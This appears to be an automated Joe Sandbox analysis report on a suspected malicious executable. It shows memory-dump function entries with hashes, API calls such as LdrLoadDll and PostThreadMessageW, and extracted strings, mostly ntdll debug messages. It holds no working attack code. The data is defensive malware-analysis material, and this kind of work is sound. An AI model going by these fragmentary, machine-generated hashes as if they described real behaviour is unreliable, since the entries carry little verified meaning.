Opcode ID: 1e35415e6b528534e32064dbd7296573922fe75c1457876134c859be8f886b45
Instruction ID: 79236e925396d682695b2399cada237cd092e8c606686ba069be8cb7562f2794
Opcode Fuzzy Hash: 1e35415e6b528534e32064dbd7296573922fe75c1457876134c859be8f886b45
Instruction Fuzzy Hash: 43210A71508200DFDB16DF9CD5C4B55FBA5FB84324F24C5ADD9094B25AC336D406CE61

Function 0171D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221595389.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3c89c64c6ae9c9e638e16c612fa3c59549ac6eeba11dac73242c939bb911be
Instruction ID: 829c22cedccabb4d43e75ee00a23e8e0e0d6df1a171cb6ae972adf1d7f232c75
Opcode Fuzzy Hash: 2c3c89c64c6ae9c9e638e16c612fa3c59549ac6eeba11dac73242c939bb911be
Instruction Fuzzy Hash: 78212575604200DFCB25DF5CD9C8B16FB65EB88314F20C5ADD8090B24AC33BD407CA61

Function 0170D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 7979fa32c3119c8612b28d8123a9b8efc31da314a986bae7fe8bead07f57cb70
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 76118C76504380CFDB16CF94D584B16BFA2FB88224F2486A9D9490B696C33AD45ACBA1

Function 0170D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: da065d913f989cbb443cc71679e52634c775b44230143a7f1a9e8e7bf8bdf08c
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 0911CD76404340CFDB12CF84D5C4B56FFA2FB84324F24C2A9ED090A256C33AE45ACBA1

Function 0171D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221595389.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: f6a5a91c80316b744ecac937ff173631fefbb38e2bef10589698f46322e23474
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: B111BE75504280CFDB12CF58D5C8B16FB61FB44314F24C6A9D8094B65AC33AD44ACF62

Function 0171D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221595389.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_171d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 48d0efd3d09bd1abd97a4e820b6bd85a70291f9032c1d35a1f62dd9f20bfbd28
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 9311BB75508280DFDB12CF58C5C8B15FBA1FB84324F24C6ADD8494B69AC33AD40ACF61

Function 0170D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa55a39695df442f6b136ee1fa91e71b573aab215f1dc782dc7b55d179e2d79
Instruction ID: e70f55f9ce2e4f18c143960f96ff7ac3ca3d6a540375f05d3044647ddb4f20a5
Opcode Fuzzy Hash: 3fa55a39695df442f6b136ee1fa91e71b573aab215f1dc782dc7b55d179e2d79
Instruction Fuzzy Hash: CE01F771004380DAE7329EE9CD84B66FFD8DF81334F18C55AED080A2C6D2399840C671

Function 0170D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2221563760.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170d000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d95dd161c4ae130b0c56970f778e087a31a473f6d99155da51d9ad82d0b0ff9
Instruction ID: 2a871d987fc20a53607616a20c7834b0eac9d1b933121ef2363faae7e2f4ea33
Opcode Fuzzy Hash: 7d95dd161c4ae130b0c56970f778e087a31a473f6d99155da51d9ad82d0b0ff9
Instruction Fuzzy Hash: D2F062724043849EE7219E59C988B66FFD8EB91734F18C55AED084A286C2799844CAB1

Non-executed Functions

Function 0783C8C1 Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

$cq, xrefs: 0783CB5A
Z, xrefs: 0783CB1C

Memory Dump Source

Source File: 00000000.00000002.2246519653.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: Z$$cq
API String ID: 0-1446845135
Opcode ID: 1fab04b87473fffd30506f30fe5f48cd36d88bd988772ca61aac1ba4f2264917
Instruction ID: 9d2a2bdefa4a380e5dcec5f2220d3783d9bedac5c058da7d8ac88afcc9642692
Opcode Fuzzy Hash: 1fab04b87473fffd30506f30fe5f48cd36d88bd988772ca61aac1ba4f2264917
Instruction Fuzzy Hash: 7681AFB191534ACFCB108F6DD8416BABBF0EF16318F058566E866E72D1D338D851CBA1

Function 0319DFC4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2222061956.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3190000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e875bdb5257deb2996a4d73918932fdc11372fb43e8c5a14653c40e98a2c795f
Instruction ID: 397c85cdbca2f3c62429d8d26f479f48875ecbbab5d219307a16b40694306500
Opcode Fuzzy Hash: e875bdb5257deb2996a4d73918932fdc11372fb43e8c5a14653c40e98a2c795f
Instruction Fuzzy Hash: DFA17136E00305DFDF09DFB4D8845AEB7B2FF88301B19856AE805AB265EB31D956CB50

Analysis Process: 4p5XLVXJnq.exePID: 6484, Parent PID: 3572COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.5%
Signature Coverage:	8.6%
Total number of Nodes:	128
Total number of Limit Nodes:	9

Executed Functions

Function 004180A3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418115

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction ID: 82db2e993d1e07e1d7644de47204ba0bce80a130be887ef06817bc54f773b708
Opcode Fuzzy Hash: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction Fuzzy Hash: 720175B1E0010DB7DF10DBE1DC42FDEB7789B14304F0082AAE90897241FA35EB598755

Function 0042CF83 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CFBA

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction ID: 6d2509923731cc3402650cfd5fc60feb34918fdb874d2f8a5cff3782f44a3a58
Opcode Fuzzy Hash: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction Fuzzy Hash: C3E04F762002147BC110BA5ADC41F9B77ACDFC5714F004459FA08A7141C671B91187F5

Function 012F2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 012F2B6A

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
Instruction ID: 21eaba16019cff5b1fc465f4880cee5be9f4b1c2bf9c72ae6f07df50fab1ac01
Opcode Fuzzy Hash: 67f089f381d2b68f297e419898672a99ff41765302aefcebdf41bb770df0dd58
Instruction Fuzzy Hash: F3900265602800439106715C4424616404A97E0205B55C061E10145D4DC52589D56225

Function 012F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 012F2DFA

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
Instruction ID: 543d39d6c4b26dcabb12ec46188cd589602545ceb2346d9be9925296b35d6cf5
Opcode Fuzzy Hash: a91585e6a1f0804c03d08f8ffff24dfdbbd13b8de132fb1b897083c87627120b
Instruction Fuzzy Hash: D490023560180453E112715C4514707004997D0245F95C452A042459CDD6568A96A221

Function 012F2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 012F2C7A

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
Instruction ID: 2145964fb828989c347cf961c0427fb3012962f47332a55482ed6428fa2947ca
Opcode Fuzzy Hash: f21eb8747f86addaf77516cc1361ed34f87efc47c5133ac74778e528c9b80d07
Instruction Fuzzy Hash: 1990023560188842E111715C841474A004597D0305F59C451A442469CDC69589D57221

Function 012F35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 012F35CA

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
Instruction ID: 78c7b917c4afae5266896b7dc76a71ae7202aaf5d565bea2ae95e1a4f8c01d71
Opcode Fuzzy Hash: 2fa55755776bdb72428a12694452f2b158e66ce8270dbb6a2a1594d3158ea298
Instruction Fuzzy Hash: E8900235A0590442E101715C4524706104597D0205F65C451A04245ACDC7958A9566A2

Function 00414903 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-631756,00000111,00000000,00000000), ref: 0041497A

Strings

-631756, xrefs: 0041496F, 00414979, 0041498A
-631756, xrefs: 00414981, 00414984

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -631756$-631756
API String ID: 1836367815-4099882158
Opcode ID: 36470c14ba36b4980fd4826332faee9524f86f03cea398697e1d2a72b88f1c4c
Instruction ID: 6c16ec639d15a14678b420446187d56407629ff0680608ba19bbe3a6ddb407f6
Opcode Fuzzy Hash: 36470c14ba36b4980fd4826332faee9524f86f03cea398697e1d2a72b88f1c4c
Instruction Fuzzy Hash: BA012BB2D4021C7EDB10AAE59C81DEF7B7CDF41398F408129FA0467201D67C4E0687A1

Function 0042D2F3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,20F845C7,00000007,00000000,00000004,00000000,00417925,000000F4), ref: 0042D332

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction ID: fc4ede9bb63be3662ecc74f3f49d82a7fe2a18f936bc3bf2dd7dd97dc60d5dfe
Opcode Fuzzy Hash: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction Fuzzy Hash: ABE06DB12002147BD614EF5ADC41FAB33ACEFC5710F404419FE08A7245C671B9118AB9

Function 0042D2A3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EE6B,?,?,00000000,?,0041EE6B,?,?,?), ref: 0042D2E2

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction ID: f0c058ad6ff32a825be29561732266307be72f8bb1a7a8645308030742660ac0
Opcode Fuzzy Hash: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction Fuzzy Hash: ACE092B22002147BD614EF5ADC41FAF37ACEFC9710F004419FE08A7282C670B9108BB9

Function 0042D343 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,C6CE2DA4,?,?,C6CE2DA4), ref: 0042D377

Memory Dump Source

Source File: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_4p5XLVXJnq.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6fe5a5a72d94321802cffe50a5f7811dbcce8a98ad70430984f235a63fa9eae5
Instruction ID: 18cf45479af2ecb15cb27987815ceb981d2a19fdd6fe511a06b4b29b7cf97ed1
Opcode Fuzzy Hash: 6fe5a5a72d94321802cffe50a5f7811dbcce8a98ad70430984f235a63fa9eae5
Instruction Fuzzy Hash: 9AE086716002147BD210FA5AEC41FDB775CDFC5714F00841AFB08A7281C674B91187F5

Function 012F2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 012F2C24

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
Instruction ID: 09c02f4eb3061897af1ed3fa233f0d80d48177fb1370d8f4abb0f61508f51e93
Opcode Fuzzy Hash: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
Instruction Fuzzy Hash: 21B09B71D019D5C5FA12E76446087177940B7D1705F16C075D3030685F8738C1D5E375

Non-executed Functions

Function 01332349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 013325A0
CFGOptions, xrefs: 01332967
MaxLoaderThreads, xrefs: 013324EC
UnloadEventTraceDepth, xrefs: 013324C0
GlobalFlag, xrefs: 01332F3F, 01333059
DisableExceptionChainValidation, xrefs: 0133275F
LdrpInitializeExecutionOptions, xrefs: 0133317D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01333176
@, xrefs: 01332942
ShutdownFlags, xrefs: 013324A1
DisableHeapLookaside, xrefs: 0133246D
MaxDeadActivationContexts, xrefs: 01332D82
@, xrefs: 01332B74
TracingFlags, xrefs: 01332549
minkernel\ntdll\ldrinit.c, xrefs: 01333187
FrontEndHeapDebugOptions, xrefs: 01332489
RaiseExceptionOnPossibleDeadlock, xrefs: 01332579
MinimumStackCommitInBytes, xrefs: 01332BB0
GlobalFlag2, xrefs: 01332FC0
UseImpersonatedDeviceMap, xrefs: 0133251C

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
Instruction ID: 3d409830899ded34dd2c63721adac31440f223da5dfeefaf99c86b87b77d7a85
Opcode Fuzzy Hash: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
Instruction Fuzzy Hash: 20929F71618342AFE721DF28C880B6BBBE8BBC4758F04492DFA95D7251D770E844CB96

Function 012E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 01325543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0132540A, 01325496, 01325519
Critical section address, xrefs: 01325425, 013254BC, 01325534
Thread identifier, xrefs: 0132553A
corrupted critical section, xrefs: 013254C2
Critical section debug info address, xrefs: 0132541F, 0132552E
Address of the debug info found in the active list., xrefs: 013254AE, 013254FA
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254CE
Invalid debug info address of this critical section, xrefs: 013254B6
8, xrefs: 013252E3
double initialized or corrupted critical section, xrefs: 01325508
Critical section address., xrefs: 01325502
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254E2
undeleted critical section in freed memory, xrefs: 0132542B

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
Instruction ID: b68c454fa91e60474a77f64ca8d1419893e776b5818a08af79b8869f1e5cb4d0
Opcode Fuzzy Hash: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
Instruction Fuzzy Hash: 3A818BB0A50358EFDF20DF99C845BAEBBB9FB09704F644119F605B7640D375A940CB90

Function 012E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01322498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01322602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013225EB
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01322409
RtlpResolveAssemblyStorageMapEntry, xrefs: 0132261F
@, xrefs: 0132259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01322412
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013224C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01322506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013222E4
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01322624

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
Instruction ID: b5ee401e5eb4eae37e6216947bef467ee33c324ffe51e2f19607962afe98d1dd
Opcode Fuzzy Hash: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
Instruction Fuzzy Hash: 51029FB1D10229DBDB31DB58CC85BAAB7B8AB44304F4151EAE709B7241EB709E84CF59

Function 01358B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

DefaultBrowser_NOPUBLISHERID, xrefs: 01358D00
services.exe, xrefs: 01358B96
SegmentHeap, xrefs: 01358BE9
svchost.exe, xrefs: 01358B68
csrss.exe, xrefs: 01358B80
runtimebroker.exe, xrefs: 01358B73
smss.exe, xrefs: 01358B8B
lsass.exe, xrefs: 01358BA1
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01358BD0
heapType, xrefs: 01358BCB

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
Instruction ID: 4c1fdf001f2b618f3040e1b9c43b765429173a2d14316d42d31edd66114bfdf4
Opcode Fuzzy Hash: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
Instruction Fuzzy Hash: 5851F0711253459BD725DF1A8844FABBBECEF94B48F14096DAE55C3280E770D504CB92

Function 01360274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 013606EA
HEAP[%wZ]: , xrefs: 01360399, 013604A8, 013605D0, 01360675, 013606CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 013604D3
RtlReAllocateHeap, xrefs: 013602BF, 01360362
HEAP: , xrefs: 013603A6, 013604B5, 013605DD, 01360682, 013606D9
About to reallocate block at %p to %Ix bytes, xrefs: 013603BA
Just reallocated block at %p to %Ix bytes, xrefs: 013605F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0136069F

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
Instruction ID: 17ee7c8d6f6990c4e8a82492ce559735d95e02157c2305c9886b1f552c133807
Opcode Fuzzy Hash: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
Instruction Fuzzy Hash: C0D10C31610286DFDB2ADF68C442AAEBBF9FF4A718F48C049F545AB656C7759880CF10

Function 013389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01338A67
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01338A3D
HandleTraces, xrefs: 01338C8F
VerifierFlags, xrefs: 01338C50
AVRF: -*- final list of providers -*- , xrefs: 01338B8F
VerifierDlls, xrefs: 01338CBD
VerifierDebug, xrefs: 01338CA5

Memory Dump Source

Source File: 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1280000_4p5XLVXJnq.jbxd

Similarity

API ID:
